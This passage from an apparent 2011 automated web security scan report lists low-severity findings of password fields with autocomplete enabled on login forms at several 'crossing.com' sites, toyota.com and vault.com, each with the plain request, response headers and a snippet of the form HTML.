Via: 1.1 AN-0016020122545304
Content-Length: 99711

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.teenagercrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.121. http://www.telecomcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.telecomcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.telecomcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:55 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=fn27b7rlsvo4speggt7vmuaia6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:56 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:56 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:56 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:56 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:56 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:56 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:56 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:56 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111736

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.telecomcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.122. http://www.toyota.com/owners/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.toyota.com
Path:   /owners/

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /owners/ HTTP/1.1
Host: www.toyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=tmstoyota; s_cc=true; s_vi=[CS]v1|269CEE6C85011498-40000111E00049C8[CE]; s_sq=%5B%5BB%5D%5D; OHVJ=CT; mbox=check#true#1295637814|session#1295637753722-357961#1295639614|PC#1295637753722-357961.17#1296847355;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Date: Fri, 21 Jan 2011 19:53:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<div class="login">
        <form method="post" action="/owners/apps/login_precheck.do" id="mytoyotaLoginForm" name="mytoyotaLoginForm">
               <div class="leftnav_title">
...[SNIP]...
<div class="search_outer">
               <input type="password" class="searchbox" name="password" id="password" onkeypress="clickSubmitOnEnter(event);"/>
            </div>
...[SNIP]...

11.123. http://www.tradingcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tradingcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.tradingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:23:47 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=pce4hd53hci195b2auvv59a984; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:23:47 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:23:47 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:23:47 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:23:47 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:23:47 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:23:47 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:23:47 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:23:47 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 97098

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.tradingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.124. http://www.trainingcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.trainingcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.trainingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:39:41 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=0n2gu3r3aojtk5vp93nt6cf8v7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:39:41 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:39:41 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:39:41 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:39:41 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:39:41 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:39:41 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:39:41 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:39:41 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 102452

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.trainingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.125. http://www.transportationcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.transportationcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.transportationcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:22 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=881r6dutr10j1cvgkdbt4hp5m4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:22 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:22 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:22 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:22 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:22 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:22 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:22 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:22 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 126822

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.transportationcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.126. http://www.travelingcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.travelingcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.travelingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:39:22 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=n1fl3n2dn89nmcpmn2rdp35b86; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:39:22 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:39:22 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:39:22 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:39:22 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:39:22 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:39:22 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:39:22 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:39:22 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111343

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.travelingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.127. http://www.truckingcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.truckingcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.truckingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:38 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=9omtff16do0dj8ujh5beudm8q4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:38 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:38 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:38 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:38 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:38 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:38 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:38 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:38 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109322

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.truckingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.128. http://www.tvcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tvcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.tvcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:06 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=4enm9d2hf1rq1gm38rib9qh690; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:06 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:22:06 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:22:06 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:06 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:22:06 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:22:06 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:22:06 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:22:06 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 101357

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.tvcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.129. http://www.underwritingcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.underwritingcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.underwritingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:51 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=0or8bng4g6nt9r0eep9e4acqb4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:51 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:51 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:51 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:51 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:51 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:51 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:51 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:51 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103082

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.underwritingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.130. http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP?companyId=421 HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:46:07 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Content-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000Teb9VfCYzGhr2FZKSSc1gr-:14a07ck6b; Path=/
Keep-Alive: timeout=10, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a9145525d5f4f58455e445a4a423660;expires=Fri, 21-Jan-2011 19:13:10 GMT;path=/
Content-Length: 92849


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
</div>


<form id="loginForm" name="loginForm" action="/wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L3dDb1ZJQSEhL3dPb0JKTnNBLzREMGo5ZWtBU0VFIS86allRRDY4NzIwMDEyLzIyMjIxL2xp/" method="POST" >
   <input type="hidden" name="WPSRedirectURL" value="http://www.vault.com/wps/myportal/usa/companies/company-profile/Vinson-&-Elkins-LLP?companyId=421"/>
...[SNIP]...
</label>
   <input id="join-password-input" name="password" type="password" value="" />
   <br clear="all" />
...[SNIP]...
</label>
   <input id="join-passconf-input" name="UserConfirm" type="password" value="" />
   <label for="join-zip-input" id="join-zipcode">
...[SNIP]...

11.131. http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP?companyId=421 HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:46:07 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Content-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000Teb9VfCYzGhr2FZKSSc1gr-:14a07ck6b; Path=/
Keep-Alive: timeout=10, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a9145525d5f4f58455e445a4a423660;expires=Fri, 21-Jan-2011 19:13:10 GMT;path=/
Content-Length: 92849


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
</div>

<form id="mainLoginForm" name="mainLoginForm" action="/wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L3dDb1ZJQSEhL3dPb0JKTnNBLzREMGo5ZWtBU0VFIS9xallRRDY4NzIwMDExLzIyMjIwL2xp/" method="POST">
                   <div class="lightbox_text2">
...[SNIP]...
</label>
<input type="password" name="password" id="password" value="" />
                       <br />
...[SNIP]...

11.132. http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:46:04 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Content-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
